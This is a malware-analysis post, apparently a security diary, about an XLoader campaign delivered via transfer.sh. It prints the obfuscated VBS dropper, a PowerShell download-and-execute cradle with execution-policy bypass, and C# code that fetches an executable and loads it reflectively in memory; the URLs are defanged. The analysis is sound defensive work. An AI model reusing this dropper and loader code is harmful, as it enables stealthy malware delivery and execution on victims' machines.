Malware Delivered Through Free Sharing Tool
File sharing is a classic operation performed by many people on a daily basis. If you can share files using big players like Dropbox or all the *Drive ("One", "Google", etc), there exists a lot of free alternatives that help to easily share files with peers. Because, still today, many organizations do not provide an "official" (read: promoted, supported, and monitored) service, users are always looking for alternatives. There are plenty of tools available like Lufi[1] or transfer.sh[2] (they are plenty of others). The sample that I spotted yesterday was delivered through the second one.
The initial payload was a gzip'd RAR archive (SHA256:949ce2559baa5021ac55523ece74c52bcf39b74d94352d9697b60594034c6dfc)
remnux@remnux:/MalwareZoo/20220323$ gzip -d -c Files.gz | file - /dev/stdin: RAR archive data, v5 remnux@remnux:/MalwareZoo/20220323$ gzip -d Files.gz && unrar t Files UNRAR 5.50 freeware Copyright (c) 1993-2017 Alexander Roshal Testing archive Files Testing COMPILLED LIST OF ITEMS.vbs OK Testing Item's Specification & Drawings.vbs OK Testing Company's Introduction.vbs OK All OK
All three files in the archive are the same. Here is the (beautified) code:
KKJDSKJDJKDSDSDSJKDSKJDSKDSKDKJSDKJSKDSKDSJKDSJKDSKJDSKDDKJEKJDKJDJKDKJDSJKDS = "W"&"s"&"c"&"r"&"i"&CHR(80)&"t."&"s"&"h"&CHR(69)&"l"&"l" Set HFDJHDFSHJDFSHDFHDSHFDSHFHFHSHFKFHKFHSFHKFSHKFHKFHFFHDSFSHDFHSDFFHSSFHD = CreateObject(KKJDSKJDJKDSDSDSJKDSKJDSKDSKDKJSDKJSKDSKDSJKDSJKDS KJDSKDDKJEKJDKJDJKDKJDSJKDS) SJKHSKHSDKHHKSDSDKHSDKHHDSKDSHKHKDSDHKDSK = "PoWERsh" HDFHKFDKHHKDFHKHDFHKK = "E" GHDSHGDHDSKHDSKHDSKHDSHKDSKHDSDSKHDKSHKDSKHDSKHSDHDSKHDSHKDSHK = ""+SJKHSKHSDKHHKSDSDKHSDKHHDSKDSHKHKDSDHKDSK+HDFHKFDKHHKDFHKHDFHKK+"LL -exeC utiO BYpASS -C i`Ex( N`eW-oB`jEct neT.We`BcLi`ENt ).dOwNloadSTrinG('hxxps://transfer[.]sh/get/z16it2/rraammm.ps1') " HFDJHDFSHJDFSHDFHDSHFDSHFHFHSHFKFHKFHSFHKFSHKFHKFHFFHDSFSHDFHSDFFHSSFHD.Run(GHDSHGDHDSKHDSKHDSKHDSHKDSKHDSDSKHDKSHKDSKHDSKHSDHDSKHDSHKDSHK),0
Pretty simple, it fetches the next payload through a share on transfer.sh.
hxxps://transfer[.]sh/get/z16it2/rraammm.ps1
The Powershell code is:
$whatever = "dXNpbmcgU3lzd ... (stuff deleted) ... b3NlKCk7fX19"; $dec = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String($whatever)); Add-Type -TypeDefinition $dec; $instance = New-Object SKWTFPdZCH.DpGVQhBvSm.HqEHXQYiIxCnIoaXttSHgHoMU; $instance.HxQcKKablTACrmEGBODiYOG hW();
$whatever contains another payload used to inject the PE and execute it:
using System;using System.IO;using System.Net; using System.Reflection;using System.Threading; namespace SKWTFPdZCH.DpGVQhBvSm { public class HqEHXQYiIxCnIoaXttSHgHoMU { private const string VhuixZgiqqTTIkrGvgRwUtDFE="hxxps://transfer[.]sh/get/ACEDn1/sdr.exe"; private MemoryStream XaXaVkSGstrUmNTeLpgVnccuS=new MemoryStream(); [STAThread] public void HxQcKKablTACrmEGBODiYOGhW() { gmrjNtqiFbYCZLoofQZiMGGJt(); imYCaeLWaNVtuIupBojHByURJ(); } private void imYCaeLWaNVtuIupBojHByURJ() { byte[]buffer=XaXaVkSGstrUmNTeLpgVnccuS.ToArray(); Assembly assembly=null; if(Environment.Version.Major>=4) { MethodInfo method=Type.GetType("System.Reflection.RuntimeAssembly").GetMethod("nLoadImage",BindingFlags.NonPublic|BindingFlags.Static); assembly=(Assembly)method.Invoke(null,new object[]{buffer,null,null,null,false,false,null}); } else { MethodInfo method=Type.GetType("System.Reflection.Assembly").GetMethod("nLoadImage",BindingFlags.NonPublic|BindingFlags.Static); assembly=(Assembly)method.Invoke(null,new object[]{buffer,null,null,null,false}); } object[]args=new object[1]; if(assembly.EntryPoint.GetParameters().Length==0) args=null; assembly.EntryPoint.Invoke(null,args); } private void gmrjNtqiFbYCZLoofQZiMGGJt() { WebRequest request=WebRequest.Create(VhuixZgiqqTTIkrGvgRwUtDFE); WebResponse response=request.GetResponse(); using(Stream web_stream=response.GetResponseStream()) { byte[]buffer=new byte[8192]; int read=0; while((read=web_stream.Read(buffer,0,buffer.Length))>0) { XaXaVkSGstrUmNTeLpgVnccuS.Write(buffer,0,read); } } response.Close(); } } }
The final payload (sdr.exe) is again downloaded from transfer.sh. It's an XLoader[3] sample.
It could be interesting to hunt for such file-sharing services in your logs... From a security point of view, Lufi is nice because all crypt/decrypt operations are performed on the client-side and the server does not see the content of shared files. However, this prevents files to be downloaded by headless browsers. transfer.sh is pretty simple and is, therefore, a nice solution for attackers! This technique is better for attackers because they don't have to compromise a website to drop their malicious content. Note that a Lufi instance could be perfectly used in a phishing campaign (via a link in the mail).
I'm running my own instance of Lufi as a honeypot and keeping an eye on it but, until now, it was never abused...
[1] https://framagit.org/fiat-tux/hat-softwares/lufi
[2] https://transfer.sh
[3] https://malpedia.caad.fkie.fraunhofer.de/details/osx.xloader
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
Comments